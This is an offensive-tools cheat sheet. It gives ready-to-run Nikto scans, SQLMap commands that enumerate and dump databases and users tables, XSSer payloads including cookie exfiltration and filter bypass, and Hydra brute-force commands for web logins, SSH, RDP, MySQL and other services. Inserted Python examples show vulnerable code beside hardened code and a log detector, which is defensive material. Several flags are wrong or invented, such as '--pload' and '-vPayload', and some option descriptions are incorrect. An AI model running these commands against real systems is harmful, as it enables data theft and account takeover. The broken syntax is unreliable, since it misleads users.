🛠️Nikto, SQLMap, XSSer & Hydra Overview
Nikto
Nikto is a powerful web server vulnerability scanner used to identify security issues on websites. Here are several ways to use Nikto effectively:
Basic Web Server Scan:
Perform a basic scan on a website:
nikto -h https://www.example.com
Scan Specific Port:
Scan a specific port on the target:
nikto -h https://www.example.com -p 8080
Scan Multiple Hosts:
Scan multiple hosts:
nikto -h https://www.example1.com https://www.example2.com
Save Output to File:
Save scan results to a file (output.txt):
nikto -h https://www.example.com -o output.txt
Full Scan with Manual Tuning:
Perform a comprehensive scan with manual tuning options:
nikto -h https://www.example.com -maxtime 3600 -Plugins -Tuning 8
SSL Certificate Check:
Check SSL certificate details:
nikto -h https://www.example.com -ssl
Scan with Authentication:
Perform a scan with authentication credentials (admin:password):
nikto -h https://www.example.com -id admin:password
Suppress Output:
Suppress all output (useful for scripting):
nikto -h https://www.example.com -o /dev/null
Scan Specific Paths:
Scan specific paths (/app, /secure) on the target:
nikto -h https://www.example.com -C all -Tuning 2 -p 443 -root /app,/secure
Disable Certain Checks:
Disable specific checks (e.g., XSS):
nikto -h https://www.example.com -C all,-XSS
SQLMap
SQLMap is a powerful command-line tool used for detecting and exploiting SQL injection vulnerabilities in web applications. Here are several examples of how to use SQLMap effectively:
Basic Scan for SQL Injection:
Perform a basic scan to detect SQL injection vulnerabilities:
sqlmap -u "https://www.example.com/page?id=1"
Detecting SQL Injection and Getting Database Information:
Detect SQL injection and retrieve database information:
sqlmap -u "https://www.example.com/page?id=1" --dbs
Enumerating Tables in a Database:
Enumerate tables in a specific database (dbname):
sqlmap -u "https://www.example.com/page?id=1" -D dbname --tables
Dumping Data from a Specific Table:
Dump data from a specific table (users):
sqlmap -u "https://www.example.com/page?id=1" -D dbname -T users --dump
Exploiting Time-Based Blind SQL Injection:
Exploit time-based blind SQL injection with a specified time delay (5 seconds):
sqlmap -u "https://www.example.com/page?id=1" --technique=T --time-sec=5
Using Custom Injection Payload:
Use a custom injection payload (1' OR '1'='1) with a POST data parameter (param=value):
sqlmap -u "https://www.example.com/page?id=1" --data="param=value" --pload="1' OR '1'='1"
Dumping All Databases:
Dump all databases on the target server:
sqlmap -u "https://www.example.com/page?id=1" --all-dbs
Brute Forcing Table Columns:
Brute force table columns in a specific database and table (dbname.users):
sqlmap -u "https://www.example.com/page?id=1" -D dbname -T users --columns
Exploiting Union-Based SQL Injection:
Exploit union-based SQL injection technique:
sqlmap -u "https://www.example.com/page?id=1" --technique=U
Using a Configuration File:
Use SQLMap with a configuration file (sqlmapconfig.conf):
sqlmap -c sqlmapconfig.conf
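The page?id=1 endpoint targeted above only yields to SQLMap when the id parameter is concatenated into the query text. Added example (not SQLMap's code and not from the page): a vulnerable lookup beside its hardened form, run against a constructed in-memory SQLite table; the table name, rows and the boolean probe "1 OR 1=1" are assumptions chosen for illustration.

```python
import sqlite3

# Constructed sample data standing in for the backend behind "page?id=1" (not the page's own schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, secret TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", [
        (1, "Home", "none"),
        (2, "Admin", "internal-only"),
        (3, "Reports", "internal-only"),
    ])
    return conn

def fetch_page_vulnerable(conn, page_id: str):
    # String concatenation: the request parameter becomes part of the SQL text,
    # so a tautology such as "1 OR 1=1" rewrites the WHERE clause and returns every row.
    sql = "SELECT id, title FROM pages WHERE id = " + page_id
    return conn.execute(sql).fetchall()

def fetch_page_hardened(conn, page_id: str):
    # Validate the expected type first, then bind the value as a parameter;
    # the parameter is passed to the engine as data and never parsed as SQL.
    if not page_id.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT id, title FROM pages WHERE id = ?", (int(page_id),)).fetchall()

def demo():
    conn = make_db()
    benign = "1"
    tautology = "1 OR 1=1"  # boolean-based probe of the kind a scanner sends
    results = {
        "vuln_benign": fetch_page_vulnerable(conn, benign),
        "vuln_tautology": fetch_page_vulnerable(conn, tautology),
        "hard_benign": fetch_page_hardened(conn, benign),
    }
    try:
        fetch_page_hardened(conn, tautology)
        results["hard_tautology"] = "accepted"
    except ValueError:
        results["hard_tautology"] = "rejected"
    return results

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```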
XSSer
XSSer is a command-line tool designed for detecting and exploiting Cross-Site Scripting (XSS) vulnerabilities in web applications. Here are several examples of how to use XSSer effectively:
Basic Scan for Stored XSS:
Perform a basic scan for stored XSS vulnerabilities on a specific URL parameter (comment):
xsser -u "https://www.example.com/profile?id=1" -c "comment"
DOM-based XSS Scan:
Conduct a scan specifically for DOM-based XSS vulnerabilities:
xsser -u "https://www.example.com/page" --dom
Scanning Multiple URLs:
Scan multiple URLs listed in a file (urls.txt):
xsser -l urls.txt
Cookie-based XSS Exploitation:
Exploit XSS using a specific cookie (auth=12345):
xsser -u "https://www.example.com/login" --cookie "auth=12345"
Reflected XSS Detection:
Detect reflected XSS vulnerabilities with a custom payload in a query parameter:
xsser -u "https://www.example.com/search?q=<script>alert(1)</script>"
Blind XSS Scan with Custom Payload:
Perform a blind XSS scan with a custom payload (<script>alert(1)</script>) injected into a parameter (name):
xsser -u "https://www.example.com/profile" -v -p "name" -vPayload "<script>alert(1)</script>"
Exfiltrating Cookies via XSS:
Exfiltrate cookies (auth=12345) via XSS exploitation:
xsser -u "https://www.example.com/profile" --cookie "auth=12345" -E
Brute Forcing Payloads:
Brute force payloads to discover XSS vulnerabilities:
xsser -u "https://www.example.com/page" --brute
Custom User-Agent Header:
Send requests with a custom User-Agent header (MyCustomUserAgent):
xsser -u "https://www.example.com/page" -H "User-Agent: MyCustomUserAgent"
XSS Filter Bypass Attempt:
Attempt to bypass XSS filters on the target:
xsser -u "https://www.example.com/page" --filter-bypass
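The reflected-XSS check above succeeds only when the search page echoes q back into the HTML unescaped. Added example (not XSSer's code and not from the page): the vulnerable rendering beside the hardened one, fed the exact URL from the reflected XSS entry; the page template and the reflects_markup check are assumptions for illustration.

```python
import html
from urllib.parse import urlsplit, parse_qs

# The URL from the reflected XSS entry above, used here as constructed input.
SAMPLE_URL = "https://www.example.com/search?q=<script>alert(1)</script>"

def query_param(url: str, name: str) -> str:
    # Extract one query parameter the way a server-side handler would.
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get(name, [""])[0]

def render_vulnerable(q: str) -> str:
    # Reflects the raw parameter into both a text context and a quoted attribute context.
    return (f"<h1>Results for {q}</h1>\n"
            f'<input name="q" value="{q}">')

def render_hardened(q: str) -> str:
    # html.escape(quote=True) turns <, >, &, " and ' into entities, so the value is
    # inert in the text context and cannot close the attribute in the input element.
    safe = html.escape(q, quote=True)
    return (f"<h1>Results for {safe}</h1>\n"
            f'<input name="q" value="{safe}">')

def reflects_markup(page: str, payload: str) -> bool:
    # Simple oracle: does the submitted markup appear verbatim in the response body?
    return payload in page

def demo():
    q = query_param(SAMPLE_URL, "q")
    return {
        "vulnerable": reflects_markup(render_vulnerable(q), q),
        "hardened": reflects_markup(render_hardened(q), q),
        "escaped": html.escape(q, quote=True),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Escaping is context-specific: the same entity encoding is not sufficient inside a script block or a URL attribute, where a different encoder applies.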
Hydra Tool
Hydra is a versatile command-line tool for performing brute force attacks against various protocols and services. Here are several examples of how to use Hydra effectively:
HTTP/HTTPS Authentication
Brute Force Attack on Login Form:
Perform a brute force attack on a login form with a specific username (admin) and passwords from a file (passwords.txt):
hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
Dictionary Attack with Custom Usernames:
Conduct a dictionary attack using custom usernames (users.txt) and passwords (passwords.txt):
hydra -L users.txt -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
Using Custom User-Agent Header:
Send requests with a custom User-Agent header (MyCustomUserAgent):
hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -H "User-Agent: MyCustomUserAgent"
Specifying a Non-Standard Port:
Specify a non-standard port (8080) for the target service:
hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -s 8080
Using a Proxy for Requests:
Route requests through a SOCKS5 proxy (localhost:9050):
hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -x socks5://localhost:9050
Brute Forcing Different HTTP Methods:
Perform brute force attacks using different HTTP methods (e.g., GET, POST):
hydra -l admin -P passwords.txt example.com http-get-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
Parallel Login Attempts:
Increase the number of parallel login attempts (16):
hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -t 16
Limiting Number of Attempts per User:
Limit the number of login attempts per user (-F):
hydra -l admin -P passwords.txt example.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials" -F
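Both the Nikto scans earlier on this page and the http-post-form runs above leave a recognisable trace in the web server's access log. Added example (not part of the page, not Nikto's or Hydra's code): a Python pass over constructed combined-format log lines that flags a self-identifying scanner user-agent and a burst of POSTs to /login.php from one source; the sample IPs, the Nikto user-agent string, the 60-second window and the threshold of 10 are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed access-log sample (Apache/nginx combined format), not from the page:
# a scanner run from 203.0.113.5, a burst of form posts from 198.51.100.9 and one normal login.
NIKTO_UA = "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"
LINE = '{ip} - - [10/May/2024:12:00:{sec:02d} +0000] "{method} {path} HTTP/1.1" {status} 0 "-" "{ua}"'
LOG_LINES = (
    [LINE.format(ip="203.0.113.5", sec=1, method="GET", path=p, status=404, ua=NIKTO_UA)
     for p in ("/cgi-bin/test.cgi", "/admin/", "/backup.zip")]
    + [LINE.format(ip="198.51.100.9", sec=2 + i // 8, method="POST", path="/login.php",
                   status=200, ua="Mozilla/5.0") for i in range(16)]
    + [LINE.format(ip="192.0.2.7", sec=5, method="POST", path="/login.php", status=302, ua="Mozilla/5.0")]
)

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

def parse(line):
    # Split one combined-format line into the fields the checks below need.
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, ua = m.groups()
    return {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "path": path, "status": int(status), "ua": ua}

def analyse(lines, login_path="/login.php", window=timedelta(seconds=60), threshold=10):
    scanner_ips, posts = set(), defaultdict(list)
    for e in filter(None, map(parse, lines)):
        if "nikto" in e["ua"].lower():          # Nikto identifies itself in its default User-Agent
            scanner_ips.add(e["ip"])
        if e["method"] == "POST" and e["path"] == login_path:
            posts[e["ip"]].append(e["time"])
    brute_ips = set()
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):           # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:    # too many login posts inside one window
                brute_ips.add(ip)
                break
    return {"scanner_ips": sorted(scanner_ips), "bruteforce_ips": sorted(brute_ips)}

if __name__ == "__main__":
    print(analyse(LOG_LINES))
```

A real deployment would also count distinct usernames per source (the -L users.txt case) and tie the alert to account lockout or rate limiting on the login endpoint.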
Other Protocol Examples
Here are examples for brute forcing passwords across various protocols:
SSH:
hydra -l username -P passwords.txt ssh://target_ip
FTP:
hydra -l admin -P wordlist.txt ftp://ftp.example.com
SMTP:
hydra -l [email protected] -P passwords.txt smtp://mail.example.com
MySQL:
hydra -l root -P passwords.txt mysql://target_ip
RDP:
hydra -l administrator -P passwords.txt rdp://target_ip
VNC:
hydra -l admin -P passwords.txt vnc://target_ip
Telnet:
hydra -l admin -P passwords.txt telnet://target_ip
Hacker's Mantra:
Are hackers a threat? The degree of threat presented by any conduct, whether legal or illegal, depends on the actions and intent of the individual and the harm they cause.